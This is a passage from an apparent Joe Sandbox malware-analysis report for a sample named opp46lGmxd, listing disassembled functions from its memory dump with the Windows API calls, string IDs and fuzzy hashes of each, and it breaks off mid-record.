                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00AB96F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                      • API String ID: 1704125052-3381328864
                                                      • Opcode ID: 2d4b1047ab09090e4a7815a3a5d7add346618c23c1242d074a82f4e0baafb2d3
                                                      • Instruction ID: edd034a2c8215d7200e6c697c68837c7ea30a51767117e289bcd24ac6508f907
                                                      • Opcode Fuzzy Hash: 2d4b1047ab09090e4a7815a3a5d7add346618c23c1242d074a82f4e0baafb2d3
                                                      • Instruction Fuzzy Hash: 7A11C677248387BAFE012720DC2BDE777DDDB15B60F200166FA04A50E2FEA269515B58
                                                      Function 00AD8BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00AD8BEC
                                                      • CoInitialize.OLE32(00000000), ref: 00AD8C19
                                                      • CoUninitialize.OLE32 ref: 00AD8C23
                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00AD8D23
                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00AD8E50
                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00AF2C0C), ref: 00AD8E84
                                                      • CoGetObject.OLE32(?,00000000,00AF2C0C,?), ref: 00AD8EA7
                                                      • SetErrorMode.KERNEL32(00000000), ref: 00AD8EBA
                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00AD8F3A
                                                      • VariantClear.OLEAUT32(?), ref: 00AD8F4A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                      • String ID:
                                                      • API String ID: 2395222682-0
                                                      • Opcode ID: 4cc92b2f0b4374deeacaad0119f22a4623557f0b0a4bc862a5edf03db50a4595
                                                      • Instruction ID: c3f2485f04f7bef7816221fcebf4dea59224a9c990ac5e6a4e008b2fe0efc500
                                                      • Opcode Fuzzy Hash: 4cc92b2f0b4374deeacaad0119f22a4623557f0b0a4bc862a5edf03db50a4595
                                                      • Instruction Fuzzy Hash: 6FC10371608305AFC700DF68C88496BB7E9FF89748F00496EF58A9B251DB75ED06CB52
                                                      Function 00AC4189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __swprintf.LIBCMT ref: 00AC419D
                                                      • __swprintf.LIBCMT ref: 00AC41AA
                                                        • Part of subcall function 00A838D8: __woutput_l.LIBCMT ref: 00A83931
                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 00AC41D4
                                                      • LoadResource.KERNEL32(?,00000000), ref: 00AC41E0
                                                      • LockResource.KERNEL32(00000000), ref: 00AC41ED
                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 00AC420D
                                                      • LoadResource.KERNEL32(?,00000000), ref: 00AC421F
                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00AC422E
                                                      • LockResource.KERNEL32(?), ref: 00AC423A
                                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00AC429B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                      • String ID:
                                                      • API String ID: 1433390588-0
                                                      • Opcode ID: fb895ccd5007e306440a6b443ca043b257c3a2b9b1f1bc9ecae9908465495ad6
                                                      • Instruction ID: c97fcb0cbc953e52844730c525ea35e59a5355f6106dfc291b858a77c1ac27af
                                                      • Opcode Fuzzy Hash: fb895ccd5007e306440a6b443ca043b257c3a2b9b1f1bc9ecae9908465495ad6
                                                      • Instruction Fuzzy Hash: 49319F7160524AAFDB119FA0DC95EFF7BA8EF18301F054529F901D6150DB30DA528BA8
                                                      Function 00AC16DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00AC1700
                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00AC0778,?,00000001), ref: 00AC1714
                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00AC171B
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AC0778,?,00000001), ref: 00AC172A
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00AC173C
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AC0778,?,00000001), ref: 00AC1755
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AC0778,?,00000001), ref: 00AC1767
                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00AC0778,?,00000001), ref: 00AC17AC
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00AC0778,?,00000001), ref: 00AC17C1
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00AC0778,?,00000001), ref: 00AC17CC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                      • String ID:
                                                      • API String ID: 2156557900-0
                                                      • Opcode ID: 8a5c3284a9268a962bff08b693b5c725a10190cc8ab7c708c5b8e50df3873816
                                                      • Instruction ID: 3e5239cfaef02e1592ad725c8235493ac69c8df064a55e1b403660865e996a7d
                                                      • Opcode Fuzzy Hash: 8a5c3284a9268a962bff08b693b5c725a10190cc8ab7c708c5b8e50df3873816
                                                      • Instruction Fuzzy Hash: 6431AE75748284AFEB21DF54DD84F697BA9EB56711F128028F8008B2A1DF709D428F64
                                                      Function 00A6FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A6FC06
                                                      • OleUninitialize.OLE32(?,00000000), ref: 00A6FCA5
                                                      • UnregisterHotKey.USER32(?), ref: 00A6FDFC
                                                      • DestroyWindow.USER32(?), ref: 00AA4A00
                                                      • FreeLibrary.KERNEL32(?), ref: 00AA4A65
                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AA4A92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                      • String ID: close all
                                                      • API String ID: 469580280-3243417748
                                                      • Opcode ID: 27c4fcd0fcd3a222d756f254ac1c05abbfa1e5a8b216e59eab0a936d0b3f7997
                                                      • Instruction ID: 373b33122b4e51f305acfbc8a51b452191878846ce8c392978b73263e6b3d35f
                                                      • Opcode Fuzzy Hash: 27c4fcd0fcd3a222d756f254ac1c05abbfa1e5a8b216e59eab0a936d0b3f7997
                                                      • Instruction Fuzzy Hash: D9A17C31701212CFCB29EF54D999E69F774AF59740F1482ADF80AAB2A1CB30AD16CF54
                                                      Function 00ABA693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EnumChildWindows.USER32(?,00ABAA64), ref: 00ABA9A2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ChildEnumWindows
                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                      • API String ID: 3555792229-1603158881
                                                      • Opcode ID: e10d613a9862087094dfc6ad0f94e7dd165d6f38e4cac87a118d8d73eaac17f8
                                                      • Instruction ID: 767237df07aa217c0755a4fc59e41e42acd3632bef103c2103e2d3f6923385a5
                                                      • Opcode Fuzzy Hash: e10d613a9862087094dfc6ad0f94e7dd165d6f38e4cac87a118d8d73eaac17f8
                                                      • Instruction Fuzzy Hash: D391B631A00246EBDB58EF70C581BEDFBB9FF14304F508119D99AA7142DF306A99DBA1
                                                      Function 00A62E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00A62EAE
                                                        • Part of subcall function 00A61DB3: GetClientRect.USER32(?,?), ref: 00A61DDC
                                                        • Part of subcall function 00A61DB3: GetWindowRect.USER32(?,?), ref: 00A61E1D
                                                        • Part of subcall function 00A61DB3: ScreenToClient.USER32(?,?), ref: 00A61E45
                                                      • GetDC.USER32 ref: 00A9CF82
                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00A9CF95
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00A9CFA3
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00A9CFB8
                                                      • ReleaseDC.USER32(?,00000000), ref: 00A9CFC0
                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00A9D04B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                      • String ID: U
                                                      • API String ID: 4009187628-3372436214
                                                      • Opcode ID: b69c0a65d690e7662b56a3c8783f172d45852ed3a1bf52972ea849e01a6ecafc
                                                      • Instruction ID: 679e9320b13b90130e3add784108ea9461f9724fe09d72774880a4b94a8d549a
                                                      • Opcode Fuzzy Hash: b69c0a65d690e7662b56a3c8783f172d45852ed3a1bf52972ea849e01a6ecafc
                                                      • Instruction Fuzzy Hash: 0671B331600645DFCF21CF64C994AAA7BF6FF49360F14427AED565B1A6C7328C82DB60
                                                      Function 00AEC27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A62612: GetWindowLongW.USER32(?,000000EB), ref: 00A62623
                                                        • Part of subcall function 00A62344: GetCursorPos.USER32(?), ref: 00A62357
                                                        • Part of subcall function 00A62344: ScreenToClient.USER32(00B267B0,?), ref: 00A62374
                                                        • Part of subcall function 00A62344: GetAsyncKeyState.USER32(00000001), ref: 00A62399
                                                        • Part of subcall function 00A62344: GetAsyncKeyState.USER32(00000002), ref: 00A623A7
                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00AEC2E4
                                                      • ImageList_EndDrag.COMCTL32 ref: 00AEC2EA
                                                      • ReleaseCapture.USER32 ref: 00AEC2F0
                                                      • SetWindowTextW.USER32(?,00000000), ref: 00AEC39A
                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00AEC3AD
                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00AEC48F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                      • API String ID: 1924731296-2107944366
                                                      • Opcode ID: 23d397e175fc0b98e839732ea2b01429a4f9a7e16c6eb5b261851ab263105128
                                                      • Instruction ID: 4470143ac0f4fe1c0cbc94014927ae71251b56414d0abe2c08a68f494e88ce9a
                                                      • Opcode Fuzzy Hash: 23d397e175fc0b98e839732ea2b01429a4f9a7e16c6eb5b261851ab263105128
                                                      • Instruction Fuzzy Hash: 31518B71204384AFD710EF24CD95FAA7BF5EB98310F00892DF5958B2E1DB70A946CB52
                                                      Function 00AD8F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00AEF910), ref: 00AD903D
                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00AEF910), ref: 00AD9071
                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00AD91EB
                                                      • SysFreeString.OLEAUT32(?), ref: 00AD9215
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                      • String ID:
                                                      • API String ID: 560350794-0
                                                      • Opcode ID: 3d90000ef8f095dfbcf95428089517bb79518c79f3f406c976cfe8b61703e2c8
                                                      • Instruction ID: 8c61dc6219ce4f509996dab508ea4d41fff0674b9a176439ae30b2de62fb507c
                                                      • Opcode Fuzzy Hash: 3d90000ef8f095dfbcf95428089517bb79518c79f3f406c976cfe8b61703e2c8
                                                      • Instruction Fuzzy Hash: 6DF1F775A00209EFDB04DF94C888EAEB7B9FF49314F10855AF516AB291DB31EE46CB50
                                                      Function 00ADF9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00ADF9C9
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00ADFB5C
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00ADFB80
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00ADFBC0
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00ADFBE2
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00ADFD5E
                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00ADFD90
                                                      • CloseHandle.KERNEL32(?), ref: 00ADFDBF
                                                      • CloseHandle.KERNEL32(?), ref: 00ADFE36
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                      • String ID:
                                                      • API String ID: 4090791747-0
                                                      • Opcode ID: 471fe7ffcf5b4a52482a29617bc9ce38b0c3f326945042a38bb196fab3131037
                                                      • Instruction ID: 5f6d2d8dcdf1ad962bdd958bc923351e08b715121722ab787d956217a964ae6f
                                                      • Opcode Fuzzy Hash: 471fe7ffcf5b4a52482a29617bc9ce38b0c3f326945042a38bb196fab3131037
                                                      • Instruction Fuzzy Hash: 3AE180312043419FCB14EF24C991A6BBBE5AF84354F18856EF89A8B3A2DB31DC45CB52
                                                      Function 00AC4F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00AC48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AC38D3,?), ref: 00AC48C7
                                                        • Part of subcall function 00AC48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AC38D3,?), ref: 00AC48E0
                                                        • Part of subcall function 00AC4CD3: GetFileAttributesW.KERNEL32(?,00AC3947), ref: 00AC4CD4
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00AC4FE2
                                                      • _wcscmp.LIBCMT ref: 00AC4FFC
                                                      • MoveFileW.KERNEL32(?,?), ref: 00AC5017
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                      • String ID:
                                                      • API String ID: 793581249-0
                                                      • Opcode ID: 32c70b357c19ba450e39cf2450f6daf2939c0a65a42b65fde9d6713cee9c8178
                                                      • Instruction ID: 23fbe8ae2e5d9fa896dc6ef0bc50d22933f2fe85362bf6449a6001f852a447ab
                                                      • Opcode Fuzzy Hash: 32c70b357c19ba450e39cf2450f6daf2939c0a65a42b65fde9d6713cee9c8178
                                                      • Instruction Fuzzy Hash: F65174B24087859BC720EBA0C995EDFB3ECAF85340F00492EB589D7151EF74B688C766
                                                      Function 00AE88B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00AE896E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: InvalidateRect
                                                      • String ID:
                                                      • API String ID: 634782764-0
                                                      • Opcode ID: ca45332fccd45cc8905a04be97a1a4aa3362230ee7ee30ae6b9aebfd28da678b
                                                      • Instruction ID: 9db7bb2f106bf7d8f70dae599a6ab5587af18dadfc76b033507e341c8f6827fe
                                                      • Opcode Fuzzy Hash: ca45332fccd45cc8905a04be97a1a4aa3362230ee7ee30ae6b9aebfd28da678b
                                                      • Instruction Fuzzy Hash: A151B2306002C8BFDF20DF2ACC85BA93BA5FB04390F604566F919E71E1DF79A9808B51
                                                      Function 00A62B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00A9C547
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A9C569
                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00A9C581
                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00A9C59F
                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00A9C5C0
                                                      • DestroyIcon.USER32(00000000), ref: 00A9C5CF
                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00A9C5EC
                                                      • DestroyIcon.USER32(?), ref: 00A9C5FB
                                                        • Part of subcall function 00AEA71E: DeleteObject.GDI32(00000000), ref: 00AEA757
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                      • String ID:
                                                      • API String ID: 2819616528-0
                                                      • Opcode ID: d10ac6be0db610fca95a805d5e09224bc200ffc94649ff39f146efdfba76c693
                                                      • Instruction ID: a843a271fe35563d7e47044b8f54b0de32599abeeb693ef4e46408ee190701f1
                                                      • Opcode Fuzzy Hash: d10ac6be0db610fca95a805d5e09224bc200ffc94649ff39f146efdfba76c693
                                                      • Instruction Fuzzy Hash: 1B515870640A49AFDB20DF24CC85FAA3BF5EB58760F104529F902AB2A0DB70ED91DB50
                                                      Function 00AB8E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00AB8A84,00000B00,?,?), ref: 00AB8E0C
                                                      • HeapAlloc.KERNEL32(00000000,?,00AB8A84,00000B00,?,?), ref: 00AB8E13
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AB8A84,00000B00,?,?), ref: 00AB8E28
                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00AB8A84,00000B00,?,?), ref: 00AB8E30
                                                      • DuplicateHandle.KERNEL32(00000000,?,00AB8A84,00000B00,?,?), ref: 00AB8E33
                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00AB8A84,00000B00,?,?), ref: 00AB8E43
                                                      • GetCurrentProcess.KERNEL32(00AB8A84,00000000,?,00AB8A84,00000B00,?,?), ref: 00AB8E4B
                                                      • DuplicateHandle.KERNEL32(00000000,?,00AB8A84,00000B00,?,?), ref: 00AB8E4E
                                                      • CreateThread.KERNEL32(00000000,00000000,00AB8E74,00000000,00000000,00000000), ref: 00AB8E68
                                                      Memory Dump Source
